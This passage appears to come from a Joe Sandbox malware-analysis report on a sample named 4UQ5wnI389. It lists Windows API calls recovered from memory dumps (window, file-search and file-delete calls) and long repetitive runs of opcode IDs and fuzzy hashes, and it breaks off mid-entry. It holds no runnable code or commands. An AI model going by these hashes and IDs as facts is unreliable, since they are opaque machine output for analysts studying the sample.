                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00437800,75572EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$\*.*
                                                                                                            • API String ID: 2035342205-351390296
                                                                                                            • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 020b5419ec405b634b7f105ef654e30d65bb87094033aec1bd15fe4c182469a7
                                                                                                            • Instruction ID: e2504808adf58ab3927dea35ac539dbdc50839418c83feaf891e47b464f9d5ed
                                                                                                            • Opcode Fuzzy Hash: 020b5419ec405b634b7f105ef654e30d65bb87094033aec1bd15fe4c182469a7
                                                                                                            • Instruction Fuzzy Hash: 6362AD74E01268CFEB64DFA5C884B9DBBB2BF89301F1081E9D809A7251DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7355659d863e01de0a6da01d12180002c5fafb6cf054b3cf29975b9287a6e4a
                                                                                                            • Instruction ID: 74dae5200212cac1917e7c967805aadc7713ee743c10532deb6bedccab3c4f85
                                                                                                            • Opcode Fuzzy Hash: d7355659d863e01de0a6da01d12180002c5fafb6cf054b3cf29975b9287a6e4a
                                                                                                            • Instruction Fuzzy Hash: 41C1E074E00218CFDB14DFA9C994B9DBBB2BF89304F2081A9D819AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 088826682dbb6d3e938e919018004e848a501a480d3f973f2ee2f41e8b413749
                                                                                                            • Instruction ID: 0879262b3ef3f635567716e5a56bff99ae57fce7b634f3c33d97ad13ca16473f
                                                                                                            • Opcode Fuzzy Hash: 088826682dbb6d3e938e919018004e848a501a480d3f973f2ee2f41e8b413749
                                                                                                            • Instruction Fuzzy Hash: 9FC1E174E00218CFDB14DFA5D994B9DBBB2BF89304F2080A9D819AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 735efabd1f0ab874ad79cba980cf86623da9d9eae76fe73422f230e7835d91e4
                                                                                                            • Instruction ID: 89b7a2a2687b6dddfe76a9ab3b70d9815c5fe5ba91db257b436c787b7ee1ea02
                                                                                                            • Opcode Fuzzy Hash: 735efabd1f0ab874ad79cba980cf86623da9d9eae76fe73422f230e7835d91e4
                                                                                                            • Instruction Fuzzy Hash: 1AC1F174E00218CFDB14DFA9C994B9DBBB2BF89304F2080A9D819AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01bb6d593587aa39262282f6c690a2074dd02db27dd3a41fae4f71ccf5444d1a
                                                                                                            • Instruction ID: 90a2dd088ba7d4f1b90b2c2460d49bd20f03b917a730caa4805da9b529013983
                                                                                                            • Opcode Fuzzy Hash: 01bb6d593587aa39262282f6c690a2074dd02db27dd3a41fae4f71ccf5444d1a
                                                                                                            • Instruction Fuzzy Hash: A4C1CF74E00218CFDB14DFA9D994B9DBBB2BF89304F2081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1497be2ae0d0031aea6b2fca8fe057f66ffaf8dd7c6403e160c9df6b6760d9da
                                                                                                            • Instruction ID: d77e7fe37b7dda84d5bae9de1805db3c560f7b71e87900f90e2453265eddab4b
                                                                                                            • Opcode Fuzzy Hash: 1497be2ae0d0031aea6b2fca8fe057f66ffaf8dd7c6403e160c9df6b6760d9da
                                                                                                            • Instruction Fuzzy Hash: F1C1EF74E00218CFDB14DFA9D994B9DBBB2BF89304F2081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 175da6c0f475843c4035a1b9557caa6eff2130fa13a4e0e59615bc30c1e5ddfc
                                                                                                            • Instruction ID: e55880653360be783894b73fe4b9c87d7d30a1a449c39d0dcad776de768c8da5
                                                                                                            • Opcode Fuzzy Hash: 175da6c0f475843c4035a1b9557caa6eff2130fa13a4e0e59615bc30c1e5ddfc
                                                                                                            • Instruction Fuzzy Hash: E9C1CF74E00218CFDB14DFA9D994B9DBBB2AF89304F2081A9D819BB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0506802c7fcfb1cccb75a7fe4d72839991a75cd191d203efef035959a53c1521
                                                                                                            • Instruction ID: 2030c5c531c294a625ba03f2ad7782668080ba4520ded7953398417ba9b385d1
                                                                                                            • Opcode Fuzzy Hash: 0506802c7fcfb1cccb75a7fe4d72839991a75cd191d203efef035959a53c1521
                                                                                                            • Instruction Fuzzy Hash: 25C1E374E00218CFEB14DFA9D994B9DBBB2BF89304F1081A9D819AB355DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7d50b715eafed6ce9abde3603e4ec0a1374a45f7d4a4e460fc0417dc3e1acd2e
                                                                                                            • Instruction ID: 01e0cb46c1c60baf4887fa5ec66d9ff4a5b0f182ec38743907ff163ce753b266
                                                                                                            • Opcode Fuzzy Hash: 7d50b715eafed6ce9abde3603e4ec0a1374a45f7d4a4e460fc0417dc3e1acd2e
                                                                                                            • Instruction Fuzzy Hash: 0AC1E274E00218CFDB14DFA9D994B9DBBB2BF89304F6081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1de45a672677757660cd253b5bc112683ec04bd113a9e17e70e5f67e2b5adbb9
                                                                                                            • Instruction ID: 87f38c51f970bd69dd4ebd7b4143613bbed3be9ea2e43f5e42ccd7689b464e5c
                                                                                                            • Opcode Fuzzy Hash: 1de45a672677757660cd253b5bc112683ec04bd113a9e17e70e5f67e2b5adbb9
                                                                                                            • Instruction Fuzzy Hash: 0AC1D274E00218CFEB14DFA5D994B9DBBB2BF89304F6081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3da8748f53143500f4f74d3c71a44f56b026b1473520ec9e207cb010b9735b9b
                                                                                                            • Instruction ID: 08e38d8e7c0c7f2ed50346a2ee34c5e4ac7c938ae750b3355ad33d02779b434a
                                                                                                            • Opcode Fuzzy Hash: 3da8748f53143500f4f74d3c71a44f56b026b1473520ec9e207cb010b9735b9b
                                                                                                            • Instruction Fuzzy Hash: 59C1D274E00218CFEB14DFA9D994B9DBBB2BF89304F1081A9D819AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b49fc1f3953db81d1a6e2d5ecdd198870ceeee65a40c99353e7ac81b9957bc5d
                                                                                                            • Instruction ID: e9f88bc0552dac8dd8949ebdd91eb1b8a488b8030f950792f25092967d7ec1f4
                                                                                                            • Opcode Fuzzy Hash: b49fc1f3953db81d1a6e2d5ecdd198870ceeee65a40c99353e7ac81b9957bc5d
                                                                                                            • Instruction Fuzzy Hash: 86C1E274E00218CFEB14DFA9D994B9DBBB2BF89304F1081A9D809AB355DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2abafde8f6a56f0ee2f6388e60107f679f7f87627678fc81c53aa8673c6125ef
                                                                                                            • Instruction ID: 4e3424c2db02d2be52e2c20a1d6978cad24cb8c37e40d8b0bd2663fcd4a3e564
                                                                                                            • Opcode Fuzzy Hash: 2abafde8f6a56f0ee2f6388e60107f679f7f87627678fc81c53aa8673c6125ef
                                                                                                            • Instruction Fuzzy Hash: 28C1D374E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D809AB354DB345E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ca315fd380e38ba4df679c8d4d989a289f34262a3f564dc8f2144600146d5c0c
                                                                                                            • Instruction ID: 043993a4f526d64f7734294b7298b0e09d2422d0052a1455b41842c2fc02d52d
                                                                                                            • Opcode Fuzzy Hash: ca315fd380e38ba4df679c8d4d989a289f34262a3f564dc8f2144600146d5c0c
                                                                                                            • Instruction Fuzzy Hash: 81C1C174E00218CFEB14DFA9D994B9DBBB2BF89304F1081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3f282ad312a947bc3465f2d118b52d0c7dd2232513965b19b0aa5290a3c81a56
                                                                                                            • Instruction ID: 83ee293ccb2b96d7251571ab787081b0c77f9f18a26756c8886b5e447742f2ff
                                                                                                            • Opcode Fuzzy Hash: 3f282ad312a947bc3465f2d118b52d0c7dd2232513965b19b0aa5290a3c81a56
                                                                                                            • Instruction Fuzzy Hash: AAC1D174E00218CFEB14DFA5D994B9DBBB2AF89304F2081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 906d238cb45af95290ca537f1fb8d61ab5da77c0c0e3f4ab39bb26e1abaaaf87
                                                                                                            • Instruction ID: 0b78ad598ffd304c69274ee35b5e57748a566879c0d68e3477556c5ee7c3c7fb
                                                                                                            • Opcode Fuzzy Hash: 906d238cb45af95290ca537f1fb8d61ab5da77c0c0e3f4ab39bb26e1abaaaf87
                                                                                                            • Instruction Fuzzy Hash: E7C1D374E00218CFEB14DFA5D994B9DBBB2BF89304F6081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a48d9122d1fdc0b21543a27d6dbe8aa1ac55256975168fcb54c4e10e3f5d2013
                                                                                                            • Instruction ID: de27cbfc317d694ea4d08388c535d85ef6e9b374a9b2df36abcaafa0c506ff2c
                                                                                                            • Opcode Fuzzy Hash: a48d9122d1fdc0b21543a27d6dbe8aa1ac55256975168fcb54c4e10e3f5d2013
                                                                                                            • Instruction Fuzzy Hash: 32C1D374E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D819AB354DB349E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ff3b9e301d36742543ad1df919c7d0cad562bd25f678f5f6ffc57cd113e8637
                                                                                                            • Instruction ID: 5f10f75511fd6157727c83652b896863710c57f8498db14404f729822d40cd91
                                                                                                            • Opcode Fuzzy Hash: 3ff3b9e301d36742543ad1df919c7d0cad562bd25f678f5f6ffc57cd113e8637
                                                                                                            • Instruction Fuzzy Hash: C3C1C374E00218CFEB14DFA9D994B9DBBB2BF89304F5081A9D809AB354DB355E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a795501898031e61193052fd092b4ecff43d11ab0507876c69fe5e9476a3e57c
                                                                                                            • Instruction ID: 18c90cf828b987121a971bd2dbeae292dd2e497abcc69c34e199d022e6934dc1
                                                                                                            • Opcode Fuzzy Hash: a795501898031e61193052fd092b4ecff43d11ab0507876c69fe5e9476a3e57c
                                                                                                            • Instruction Fuzzy Hash: B5C1E274E00218CFEB14DFA5D994B9DBBB2BF89304F6081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9240356cd783471c5cc9b2ff8f84d252b200b49efff8234a12ccf7a5a819d039
                                                                                                            • Instruction ID: 2a2ba5d559041d39b308d50d63883517c3d5173e52230c1486ab7d7aef06a89d
                                                                                                            • Opcode Fuzzy Hash: 9240356cd783471c5cc9b2ff8f84d252b200b49efff8234a12ccf7a5a819d039
                                                                                                            • Instruction Fuzzy Hash: 6AC1C274E00218CFEB14DFA5D994B9DBBB2BF89304F5081A9D809AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 43b80a44cf9fe1e567776ecfbe743bfe1dc7aa1fdf1623d9a1b68d94c3f16b00
                                                                                                            • Instruction ID: c9f770ba9d1c28526d049f41b661c7a20c41df54b7d7d98a7e5a802ddeb33e4e
                                                                                                            • Opcode Fuzzy Hash: 43b80a44cf9fe1e567776ecfbe743bfe1dc7aa1fdf1623d9a1b68d94c3f16b00
                                                                                                            • Instruction Fuzzy Hash: 37C1D374E00218CFEB14DFA5D994B9DBBB2BF89304F1081A9D819AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f351334cb10d03b60a344640294f2d11ff27d7fe619355777cc8687813d48ab8
                                                                                                            • Instruction ID: 695d4d3070cc71ea628efec82db1cd7345a110dba3d47369ec9fe3ed8b95e798
